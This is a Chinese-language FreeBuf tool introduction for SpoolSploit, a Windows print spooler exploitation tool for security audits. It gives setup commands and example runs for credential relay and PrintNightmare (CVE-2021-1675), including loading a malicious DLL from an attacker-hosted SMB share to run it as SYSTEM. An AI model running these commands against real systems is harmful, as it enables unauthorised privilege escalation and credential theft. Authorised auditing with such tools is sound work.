freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

如何使用SpoolSploit审查Windows打印后台处理程序的安全性
2021-11-27 15:00:37

关于SpoolSploit

SpoolSploit是一款针对Windows打印后台处理程序(print spooler)的安全审计工具,广大研究人员可以使用SpoolSploit检测Windows打印后台处理程序(print spooler)中存在的安全漏洞,并通过实际的利用技术来进行渗透测试或安全审计。

SpoolSploit中还封装了很多其他的实用工具,以便进行实际的漏洞利用和渗透测试。并实现了两种方法来中继计算机帐户凭据,以升级权限并在具有完全系统访问权限的节点上执行恶意DLL。

快速开始

自该项目发布之日起,SpoolSploit Docker容器已在最新版本的macOS、Ubuntu Linux和Windows 10上成功测试。

我们建议广大用户在SpoolSploit Docker容器内执行渗透测试或凭据中继测试,并托管相应的DLL文件,然后确保运行Docker容器的主机上开启并未使用的445端口。在Windows主机上运行此容器时,这种情况最为普遍,因为默认情况下它使用的是端口445。如果你的主机上端口445已被占用或无法使用的话,可以在网桥模式下配置了网络适配器的虚拟机中运行Docker容器即可。

工具下载&访问SpoolSploit容器

首先,使用下列命令将该项目源码克隆至本地:

git clone https://github.com/BeetleChunks/SpoolSploit

接下来,构建SpoolSploit Docker容器镜像:

cd SpoolSploit

sudo docker build -t spoolsploit .

创建并启动SpoolSploit Docker容器:

sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest

绑定容器:

sudo docker exec -it spoolsploit /bin/bash

命令行使用

usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

optional arguments:

  -h, --help               显示帮助信息并退出

  -a {spoolsample,nightmare}, --attack {spoolsample,nightmare}

                        需要在目标主机上执行的测试类型

  -rH RHOST, --rhost RHOST

                        远程目标IP、CIDR范围或文件名 (file:<path>)

  -rP {139,445}, --rport {139,445}

                        远程SMB服务器端口

  -lH LHOST, --lhost LHOST

                        监听主机名或IP地址

  -lS LSHARE, --lshare LSHARE

                        SMB共享 (UNC)

  -d DOMAIN, --domain DOMAIN

                        身份认证域名

  -u USER, --username USER

                        身份认证用户名

  -p PASSWD, --password PASSWD

                        身份认证密码

工机使用样例

使用样例1

python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

使用样例2

python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

SpoolSample - Windows设备账号凭证获取和中继

PrintNightmare (CVE-2021-1675) - 在目标Windows设备上以SYSTEM权限执行恶意DLL

sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/

sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'

工具使用截图

项目地址

SpoolSploit:GitHub传送门

参考资料

# Windows系统安全 # print spooler
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录